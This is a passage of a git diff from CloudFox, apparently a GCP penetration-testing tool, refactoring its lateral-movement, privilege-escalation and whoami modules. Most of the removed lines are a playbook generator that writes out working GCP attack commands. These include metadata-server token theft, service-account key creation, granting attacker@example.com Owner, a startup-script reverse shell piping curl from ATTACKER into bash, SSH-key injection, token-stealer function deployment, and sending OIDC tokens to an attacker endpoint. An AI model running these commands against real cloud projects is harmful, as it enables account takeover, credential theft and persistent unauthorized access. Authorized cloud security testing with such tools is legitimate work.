chain.TargetSA, - strings.Join(chain.Path, " -> "), - chain.ExploitCommand, - ) -} - -func (m *LateralMovementModule) addTokenTheftVectorToLoot(projectID string, vector TokenTheftVector) { - lootFile := m.LootMap[projectID]["token-theft-commands"] +func (m *LateralMovementModule) addPathToLoot(path attackpathservice.AttackPath, projectID string) { + lootFile := m.LootMap[projectID]["lateral-movement-commands"] if lootFile == nil { return } lootFile.Contents += fmt.Sprintf( - "# Token Theft: %s (%s)\n"+ - "# Project: %s\n"+ - "# Service Account: %s\n"+ - "# Attack Vector: %s\n"+ + "# Method: %s\n"+ + "# Category: %s\n"+ + "# Principal: %s (%s)\n"+ + "# Target: %s\n"+ + "# Permissions: %s\n"+ "%s\n\n", - vector.ResourceType, - vector.ResourceName, - vector.ProjectID, - vector.ServiceAccount, - vector.AttackVector, - vector.ExploitCommand, + path.Method, + path.Category, + path.Principal, path.PrincipalType, + path.TargetResource, + strings.Join(path.Permissions, ", "), + path.ExploitCommand, ) } @@ -1125,66 +753,36 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal } } -func (m *LateralMovementModule) getChainsHeader() []string { +func (m *LateralMovementModule) getHeader() []string { return []string{ - "Source Identity", - "Action", - "Target Service Account", - "Impersonation Path", + "Scope Type", + "Scope Name", + "Principal", + "Principal Type", + "Method", + "Target Resource", + "Category", + "Permissions", } } -func (m *LateralMovementModule) getVectorsHeader() []string { - return []string{ - "Project Name", - "Project ID", - "Source Resource Type", - "Source Resource Name", - "Action", - "Target Service Account", - } -} - -func (m *LateralMovementModule) chainsToTableBody(chains []ImpersonationChain) [][]string { +func (m *LateralMovementModule) pathsToTableBody(paths []attackpathservice.AttackPath) [][]string { var body [][]string - for _, chain := range chains { - action := "Impersonate (Get Token)" - if strings.Contains(chain.ExploitCommand, "keys create") { - action = "Create Key" - } - - body = append(body, []string{ - chain.StartIdentity, - action, - chain.TargetSA, - strings.Join(chain.Path, " -> "), - }) - } - return body -} - -func (m *LateralMovementModule) vectorsToTableBody(vectors []TokenTheftVector) [][]string { - var body [][]string - for _, vector := range vectors { - action := vector.AttackVector - switch vector.AttackVector { - case "metadata_server": - action = "Steal Token (Metadata)" - case "function_execution": - action = "Steal Token (Function)" - case "container_execution": - action = "Steal Token (Container)" - case "pod_service_account": - action = "Steal Token (Pod)" + for _, path := range paths { + scopeName := path.ScopeName + if scopeName == "" { + scopeName = path.ScopeID } body = append(body, []string{ - m.GetProjectName(vector.ProjectID), - vector.ProjectID, - vector.ResourceType, - vector.ResourceName, - action, - vector.ServiceAccount, + path.ScopeType, + scopeName, + path.Principal, + path.PrincipalType, + path.Method, + path.TargetResource, + path.Category, + strings.Join(path.Permissions, ", "), }) } return body @@ -1193,19 +791,11 @@ func (m *LateralMovementModule) vectorsToTableBody(vectors []TokenTheftVector) [ func (m *LateralMovementModule) buildTablesForProject(projectID string) []internal.TableFile { var tableFiles []internal.TableFile - if chains, ok := m.ProjectImpersonationChains[projectID]; ok && len(chains) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "lateral-impersonation-chains", - Header: m.getChainsHeader(), - Body: m.chainsToTableBody(chains), - }) - } - - if vectors, ok := m.ProjectTokenTheftVectors[projectID]; ok && len(vectors) > 0 { + if paths, ok := m.ProjectPaths[projectID]; ok && len(paths) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "lateral-token-theft", - Header: m.getVectorsHeader(), - Body: m.vectorsToTableBody(vectors), + Name: "lateral-movement", + Header: m.getHeader(), + Body: m.pathsToTableBody(paths), }) } @@ -1218,19 +808,10 @@ func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, log ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Collect all project IDs that have data - projectIDs := make(map[string]bool) - for projectID := range m.ProjectImpersonationChains { - projectIDs[projectID] = true - } - for projectID := range m.ProjectTokenTheftVectors { - projectIDs[projectID] = true - } - // Generate playbook once for all projects playbook := m.generatePlaybook() - for projectID := range projectIDs { + for projectID := range m.ProjectPaths { tableFiles := m.buildTablesForProject(projectID) var lootFiles []internal.LootFile @@ -1259,25 +840,13 @@ func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, log } func (m *LateralMovementModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { - allChains := m.getAllImpersonationChains() - allVectors := m.getAllTokenTheftVectors() - tables := []internal.TableFile{} - if len(allChains) > 0 { - tables = append(tables, internal.TableFile{ - Name: "lateral-impersonation-chains", - Header: m.getChainsHeader(), - Body: m.chainsToTableBody(allChains), - }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d impersonation chain(s)", len(allChains)), GCP_LATERALMOVEMENT_MODULE_NAME) - } - - if len(allVectors) > 0 { + if len(m.AllPaths) > 0 { tables = append(tables, internal.TableFile{ - Name: "lateral-token-theft", - Header: m.getVectorsHeader(), - Body: m.vectorsToTableBody(allVectors), + Name: "lateral-movement", + Header: m.getHeader(), + Body: m.pathsToTableBody(m.AllPaths), }) } diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 60960d7c..3c4ae96d 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -184,482 +184,9 @@ func (m *PrivescModule) generateLoot() { func (m *PrivescModule) generatePlaybook() { m.LootMap["privesc-playbook"] = &internal.LootFile{ - Name: "privesc-playbook", - Contents: `# GCP Privilege Escalation Playbook -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified privilege escalation paths. - -` + m.generatePlaybookSections(), - } -} - -func (m *PrivescModule) generatePlaybookSections() string { - var sections strings.Builder - - // Group paths by category - categories := map[string][]attackpathservice.AttackPath{ - "SA Impersonation": {}, - "Key Creation": {}, - "IAM Modification": {}, - "Compute": {}, - "Serverless": {}, - "Data Processing": {}, - "AI/ML": {}, - "Orchestration": {}, - "CI/CD": {}, - "IaC": {}, - "GKE": {}, - "Secrets": {}, - "Federation": {}, - "Org Policy": {}, - "Network Access": {}, - "SA Usage": {}, - "Billing": {}, - } - - for _, path := range m.AllPaths { - if _, ok := categories[path.Category]; ok { - categories[path.Category] = append(categories[path.Category], path) - } - } - - // Service Account Impersonation - if len(categories["SA Impersonation"]) > 0 { - sections.WriteString("## Service Account Impersonation\n\n") - sections.WriteString("Principals with SA impersonation capabilities can generate tokens and act as service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["SA Impersonation"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Generate access token for a service account (iam.serviceAccounts.getAccessToken)\n") - sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Sign a blob as the SA (iam.serviceAccounts.signBlob)\n") - sections.WriteString("echo 'data' | gcloud iam service-accounts sign-blob - signed.txt \\\n") - sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Sign a JWT as the SA (iam.serviceAccounts.signJwt)\n") - sections.WriteString("gcloud iam service-accounts sign-jwt input.json output.jwt \\\n") - sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Generate OIDC token (iam.serviceAccounts.getOpenIdToken)\n") - sections.WriteString("gcloud auth print-identity-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // Key Creation - if len(categories["Key Creation"]) > 0 { - sections.WriteString("## Persistent Key Creation\n\n") - sections.WriteString("Principals with key creation capabilities can create long-lived credentials.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Key Creation"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create persistent SA key (iam.serviceAccountKeys.create)\n") - sections.WriteString("gcloud iam service-accounts keys create key.json \\\n") - sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Use the key\n") - sections.WriteString("gcloud auth activate-service-account --key-file=key.json\n\n") - sections.WriteString("# Create HMAC key for S3-compatible access (storage.hmacKeys.create)\n") - sections.WriteString("gcloud storage hmac create TARGET_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // IAM Modification - if len(categories["IAM Modification"]) > 0 { - sections.WriteString("## IAM Policy Modification\n\n") - sections.WriteString("Principals with IAM modification capabilities can grant themselves elevated access.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["IAM Modification"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Grant Owner role at project level\n") - sections.WriteString("gcloud projects add-iam-policy-binding PROJECT_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/owner'\n\n") - sections.WriteString("# Grant SA impersonation on a privileged SA\n") - sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") - sections.WriteString(" TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/iam.serviceAccountTokenCreator'\n\n") - sections.WriteString("# Create custom role with escalation permissions\n") - sections.WriteString("gcloud iam roles create privesc --project=PROJECT_ID \\\n") - sections.WriteString(" --permissions='iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create'\n") - sections.WriteString("```\n\n") - } - - // Compute - if len(categories["Compute"]) > 0 { - sections.WriteString("## Compute Instance Exploitation\n\n") - sections.WriteString("Principals with compute permissions can create instances or modify metadata to escalate privileges.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Compute"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create instance with privileged SA (compute.instances.create + iam.serviceAccounts.actAs)\n") - sections.WriteString("gcloud compute instances create pwned \\\n") - sections.WriteString(" --zone=us-central1-a \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --scopes=cloud-platform\n\n") - sections.WriteString("# SSH and steal token\n") - sections.WriteString("gcloud compute ssh pwned --zone=us-central1-a \\\n") - sections.WriteString(" --command='curl -s -H \"Metadata-Flavor: Google\" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") - sections.WriteString("# Inject startup script for reverse shell (compute.instances.setMetadata)\n") - sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") - sections.WriteString(" --metadata=startup-script='#!/bin/bash\n") - sections.WriteString("curl http://ATTACKER/shell.sh | bash'\n\n") - sections.WriteString("# Add SSH key via metadata\n") - sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") - sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n\n") - sections.WriteString("# Project-wide SSH key injection (compute.projects.setCommonInstanceMetadata)\n") - sections.WriteString("gcloud compute project-info add-metadata \\\n") - sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n") - sections.WriteString("```\n\n") - } - - // Serverless - if len(categories["Serverless"]) > 0 { - sections.WriteString("## Serverless Function/Service Exploitation\n\n") - sections.WriteString("Principals with serverless permissions can deploy code that runs as privileged service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Serverless"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Cloud Functions:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create function that steals SA token\n") - sections.WriteString("mkdir /tmp/pwn && cd /tmp/pwn\n") - sections.WriteString("cat > main.py << 'EOF'\n") - sections.WriteString("import functions_framework\n") - sections.WriteString("import requests\n\n") - sections.WriteString("@functions_framework.http\n") - sections.WriteString("def pwn(request):\n") - sections.WriteString(" r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") - sections.WriteString(" headers={'Metadata-Flavor': 'Google'})\n") - sections.WriteString(" return r.json()\n") - sections.WriteString("EOF\n") - sections.WriteString("echo 'functions-framework\\nrequests' > requirements.txt\n\n") - sections.WriteString("# Deploy with target SA\n") - sections.WriteString("gcloud functions deploy token-stealer --gen2 --runtime=python311 \\\n") - sections.WriteString(" --trigger-http --allow-unauthenticated \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Cloud Run:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Deploy Cloud Run service with target SA\n") - sections.WriteString("gcloud run deploy token-stealer --image=gcr.io/PROJECT/stealer \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --allow-unauthenticated\n") - sections.WriteString("```\n\n") - } - - // Data Processing - if len(categories["Data Processing"]) > 0 { - sections.WriteString("## Data Processing Service Exploitation\n\n") - sections.WriteString("Principals with data processing permissions can submit jobs that run as privileged service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Data Processing"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Dataproc:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create Dataproc cluster with privileged SA\n") - sections.WriteString("gcloud dataproc clusters create pwned \\\n") - sections.WriteString(" --region=us-central1 \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Submit job to steal token\n") - sections.WriteString("gcloud dataproc jobs submit pyspark token_stealer.py \\\n") - sections.WriteString(" --cluster=pwned --region=us-central1\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Dataflow:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create Dataflow job with privileged SA\n") - sections.WriteString("gcloud dataflow jobs run pwned \\\n") - sections.WriteString(" --gcs-location=gs://dataflow-templates/latest/Word_Count \\\n") - sections.WriteString(" --service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // CI/CD - if len(categories["CI/CD"]) > 0 { - sections.WriteString("## CI/CD Service Exploitation\n\n") - sections.WriteString("Principals with CI/CD permissions can run builds with the Cloud Build service account.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["CI/CD"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create malicious cloudbuild.yaml\n") - sections.WriteString("cat > cloudbuild.yaml << 'EOF'\n") - sections.WriteString("steps:\n") - sections.WriteString("- name: 'gcr.io/cloud-builders/gcloud'\n") - sections.WriteString(" entrypoint: 'bash'\n") - sections.WriteString(" args:\n") - sections.WriteString(" - '-c'\n") - sections.WriteString(" - |\n") - sections.WriteString(" # Cloud Build SA has project Editor by default!\n") - sections.WriteString(" gcloud projects add-iam-policy-binding $PROJECT_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/owner'\n") - sections.WriteString("EOF\n\n") - sections.WriteString("# Submit build\n") - sections.WriteString("gcloud builds submit --config=cloudbuild.yaml .\n") - sections.WriteString("```\n\n") - } - - // GKE - if len(categories["GKE"]) > 0 { - sections.WriteString("## GKE Cluster Exploitation\n\n") - sections.WriteString("Principals with GKE permissions can access clusters, exec into pods, or read secrets.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["GKE"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Get cluster credentials\n") - sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE\n\n") - sections.WriteString("# Exec into a pod\n") - sections.WriteString("kubectl exec -it POD_NAME -- /bin/sh\n\n") - sections.WriteString("# Read secrets\n") - sections.WriteString("kubectl get secrets -A -o yaml\n\n") - sections.WriteString("# Steal node SA token (if Workload Identity not enabled)\n") - sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\n") - sections.WriteString("```\n\n") - } - - // Secrets - if len(categories["Secrets"]) > 0 { - sections.WriteString("## Secret Access\n\n") - sections.WriteString("Principals with secret access can retrieve sensitive credentials.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Secrets"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List all secrets\n") - sections.WriteString("gcloud secrets list --project=PROJECT_ID\n\n") - sections.WriteString("# Access secret value\n") - sections.WriteString("gcloud secrets versions access latest --secret=SECRET_NAME --project=PROJECT_ID\n\n") - sections.WriteString("# Grant yourself secret access if you have setIamPolicy\n") - sections.WriteString("gcloud secrets add-iam-policy-binding SECRET_NAME \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/secretmanager.secretAccessor'\n") - sections.WriteString("```\n\n") - } - - // Orchestration - if len(categories["Orchestration"]) > 0 { - sections.WriteString("## Orchestration Service Exploitation\n\n") - sections.WriteString("Principals with orchestration permissions can create environments that run as privileged SAs.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Orchestration"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Cloud Composer:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Composer environments run Airflow with a highly privileged SA\n") - sections.WriteString("# Create environment with target SA\n") - sections.WriteString("gcloud composer environments create pwned \\\n") - sections.WriteString(" --location=us-central1 \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Upload malicious DAG to steal credentials\n") - sections.WriteString("gcloud composer environments storage dags import \\\n") - sections.WriteString(" --environment=pwned --location=us-central1 \\\n") - sections.WriteString(" --source=malicious_dag.py\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Cloud Scheduler:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create scheduled job that runs with target SA (OIDC auth)\n") - sections.WriteString("gcloud scheduler jobs create http privesc-job \\\n") - sections.WriteString(" --schedule='* * * * *' \\\n") - sections.WriteString(" --uri='https://ATTACKER_CONTROLLED_ENDPOINT/receive' \\\n") - sections.WriteString(" --oidc-service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --location=us-central1\n\n") - sections.WriteString("# The endpoint receives requests with an OIDC token signed by the SA\n") - sections.WriteString("# Extract the token from the Authorization header\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Cloud Tasks:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create task queue\n") - sections.WriteString("gcloud tasks queues create privesc-queue --location=us-central1\n\n") - sections.WriteString("# Create HTTP task with OIDC token\n") - sections.WriteString("gcloud tasks create-http-task \\\n") - sections.WriteString(" --queue=privesc-queue \\\n") - sections.WriteString(" --url='https://ATTACKER_CONTROLLED_ENDPOINT/receive' \\\n") - sections.WriteString(" --oidc-service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --location=us-central1\n") - sections.WriteString("```\n\n") - } - - // AI/ML - if len(categories["AI/ML"]) > 0 { - sections.WriteString("## AI/ML Platform Exploitation\n\n") - sections.WriteString("Principals with AI/ML permissions can create notebooks or training jobs that run as privileged SAs.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["AI/ML"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Vertex AI Workbench:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create notebook instance with privileged SA\n") - sections.WriteString("gcloud notebooks instances create privesc-notebook \\\n") - sections.WriteString(" --location=us-central1-a \\\n") - sections.WriteString(" --machine-type=n1-standard-4 \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Access the notebook via JupyterLab UI or proxy\n") - sections.WriteString("gcloud notebooks instances describe privesc-notebook --location=us-central1-a\n\n") - sections.WriteString("# In the notebook, steal the SA token:\n") - sections.WriteString("# import requests\n") - sections.WriteString("# r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") - sections.WriteString("# headers={'Metadata-Flavor': 'Google'})\n") - sections.WriteString("# print(r.json()['access_token'])\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Vertex AI Custom Jobs:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create custom training job with privileged SA\n") - sections.WriteString("gcloud ai custom-jobs create \\\n") - sections.WriteString(" --region=us-central1 \\\n") - sections.WriteString(" --display-name=privesc-job \\\n") - sections.WriteString(" --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=gcr.io/PROJECT/token-stealer \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") + Name: "privesc-playbook", + Contents: attackpathservice.GeneratePrivescPlaybook(m.AllPaths, ""), } - - // IaC (Infrastructure as Code) - if len(categories["IaC"]) > 0 { - sections.WriteString("## Infrastructure as Code Exploitation\n\n") - sections.WriteString("Principals with IaC permissions can deploy infrastructure using the Deployment Manager service account.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["IaC"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Deployment Manager:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create deployment config that grants attacker Owner role\n") - sections.WriteString("cat > privesc-config.yaml << 'EOF'\n") - sections.WriteString("resources:\n") - sections.WriteString("- name: privesc-binding\n") - sections.WriteString(" type: gcp-types/cloudresourcemanager-v1:virtual.projects.iamMemberBinding\n") - sections.WriteString(" properties:\n") - sections.WriteString(" resource: PROJECT_ID\n") - sections.WriteString(" role: roles/owner\n") - sections.WriteString(" member: user:attacker@example.com\n") - sections.WriteString("EOF\n\n") - sections.WriteString("# Deploy - runs as [PROJECT_NUMBER]@cloudservices.gserviceaccount.com\n") - sections.WriteString("# This SA typically has Editor role on the project\n") - sections.WriteString("gcloud deployment-manager deployments create privesc-deploy \\\n") - sections.WriteString(" --config=privesc-config.yaml\n") - sections.WriteString("```\n\n") - } - - // Federation (Workload Identity) - if len(categories["Federation"]) > 0 { - sections.WriteString("## Workload Identity Federation Exploitation\n\n") - sections.WriteString("Principals with federation permissions can create identity pools that allow external identities to impersonate GCP service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Federation"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create workload identity pool\n") - sections.WriteString("gcloud iam workload-identity-pools create attacker-pool \\\n") - sections.WriteString(" --location=global \\\n") - sections.WriteString(" --display-name='Attacker Pool'\n\n") - sections.WriteString("# Create OIDC provider pointing to attacker-controlled IdP\n") - sections.WriteString("gcloud iam workload-identity-pools providers create-oidc attacker-provider \\\n") - sections.WriteString(" --location=global \\\n") - sections.WriteString(" --workload-identity-pool=attacker-pool \\\n") - sections.WriteString(" --issuer-uri='https://attacker-idp.example.com' \\\n") - sections.WriteString(" --attribute-mapping='google.subject=assertion.sub'\n\n") - sections.WriteString("# Grant the pool's identities ability to impersonate a SA\n") - sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") - sections.WriteString(" PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --role=roles/iam.workloadIdentityUser \\\n") - sections.WriteString(" --member='principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/attacker-pool/*'\n\n") - sections.WriteString("# Now authenticate from external system and get GCP token\n") - sections.WriteString("# This allows persistent access from outside GCP\n") - sections.WriteString("```\n\n") - } - - // Org Policy - if len(categories["Org Policy"]) > 0 { - sections.WriteString("## Organization Policy Exploitation\n\n") - sections.WriteString("Principals with org policy permissions can disable security constraints across the organization.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Org Policy"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Disable domain restricted sharing constraint\n") - sections.WriteString("cat > policy.yaml << 'EOF'\n") - sections.WriteString("constraint: constraints/iam.allowedPolicyMemberDomains\n") - sections.WriteString("listPolicy:\n") - sections.WriteString(" allValues: ALLOW\n") - sections.WriteString("EOF\n") - sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n\n") - sections.WriteString("# Disable service account key creation constraint\n") - sections.WriteString("cat > policy.yaml << 'EOF'\n") - sections.WriteString("constraint: constraints/iam.disableServiceAccountKeyCreation\n") - sections.WriteString("booleanPolicy:\n") - sections.WriteString(" enforced: false\n") - sections.WriteString("EOF\n") - sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n\n") - sections.WriteString("# Disable VM external IP constraint\n") - sections.WriteString("cat > policy.yaml << 'EOF'\n") - sections.WriteString("constraint: constraints/compute.vmExternalIpAccess\n") - sections.WriteString("listPolicy:\n") - sections.WriteString(" allValues: ALLOW\n") - sections.WriteString("EOF\n") - sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n") - sections.WriteString("```\n\n") - } - - // Network Access - if len(categories["Network Access"]) > 0 { - sections.WriteString("## Network Access Exploitation\n\n") - sections.WriteString("Principals with network access permissions can create tunnels or modify firewall rules to access internal resources.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Network Access"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - IAP Tunnel:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Start IAP tunnel to SSH port\n") - sections.WriteString("gcloud compute start-iap-tunnel INSTANCE_NAME 22 \\\n") - sections.WriteString(" --local-host-port=localhost:2222 \\\n") - sections.WriteString(" --zone=us-central1-a\n\n") - sections.WriteString("# SSH through the tunnel\n") - sections.WriteString("ssh -p 2222 user@localhost\n\n") - sections.WriteString("# Or use gcloud directly\n") - sections.WriteString("gcloud compute ssh INSTANCE_NAME --zone=us-central1-a --tunnel-through-iap\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Firewall Rules:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create firewall rule allowing attacker IP\n") - sections.WriteString("gcloud compute firewall-rules create allow-attacker \\\n") - sections.WriteString(" --network=default \\\n") - sections.WriteString(" --allow=tcp:22,tcp:3389,tcp:443 \\\n") - sections.WriteString(" --source-ranges=ATTACKER_IP/32 \\\n") - sections.WriteString(" --target-tags=all-instances\n\n") - sections.WriteString("# Modify existing rule to allow more access\n") - sections.WriteString("gcloud compute firewall-rules update RULE_NAME \\\n") - sections.WriteString(" --source-ranges=0.0.0.0/0\n") - sections.WriteString("```\n\n") - } - - return sections.String() } func (m *PrivescModule) addPathToLoot(path attackpathservice.AttackPath) { diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index cf6486e7..ecdb1bb4 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1193,6 +1193,19 @@ func (m *WhoAmIModule) initializeLootFiles() { Name: "whoami-lateral-movement", Contents: "# Lateral Movement Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", } + // Playbook files with detailed exploitation techniques + m.LootMap["whoami-privesc-playbook"] = &internal.LootFile{ + Name: "whoami-privesc-playbook", + Contents: "", + } + m.LootMap["whoami-data-exfil-playbook"] = &internal.LootFile{ + Name: "whoami-data-exfil-playbook", + Contents: "", + } + m.LootMap["whoami-lateral-movement-playbook"] = &internal.LootFile{ + Name: "whoami-lateral-movement-playbook", + Contents: "", + } } } @@ -1234,7 +1247,7 @@ func (m *WhoAmIModule) generateLoot() { // Use the stored command if available, otherwise generate one exploitCmd := path.Command if exploitCmd == "" { - exploitCmd = generatePrivescExploitCmd(path.Permission, path.ProjectID) + exploitCmd = attackpathservice.GeneratePrivescCommand(path.Permission, path.ProjectID, path.ProjectID) } m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( "## %s\n"+ @@ -1269,7 +1282,7 @@ func (m *WhoAmIModule) generateLoot() { cap.Description, cap.SourceRole, cap.SourceScope, - 